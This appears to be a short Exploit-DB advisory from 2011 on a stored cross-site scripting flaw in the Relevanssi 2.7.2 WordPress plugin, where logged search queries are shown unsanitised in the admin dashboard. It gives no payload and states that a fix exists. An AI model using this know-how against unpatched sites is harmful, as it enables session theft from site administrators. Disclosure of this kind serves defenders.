Relevanssi 2.7.2 WordPress Plugin - Stored XSS Vulnerability

ID EDB-ID:16233
Type exploitdb
Reporter Saif El-Sherei
Modified 2011-02-24T00:00:00


Relevanssi 2.7.2 Wordpress Plugin - Stored XSS Vulnerability. Webapps exploit for php platform

                                            # Exploit Title: Relevanssi User Searches WordPress plugin Stored XSS
# Date: 20-2-2011
# Author: Saif El-Sherei
# Software Link:
# Version: Relevanssi 2.7.2, WordPress 3.0.5
# Tested on: FireFox 3.6.13, IE 8
# Vendor Response: plugin author released an update to fix this issue


Relevanssi replaces the standard WordPress search with a better search
engine, with lots of features and configurable options. You'll get better
results, better presentation of results - your users will thank you.
downloaded 34,3963 times.


Log search queries must be enabled in the plugin settings; A stored XSS
vulnerability exists due to "search Query" variable is displayed & logged
unsanitized in the "User Searches" section in the admin Dashboard, allowing
an attacker to inject malicious HTML code.




Update to latest plugin version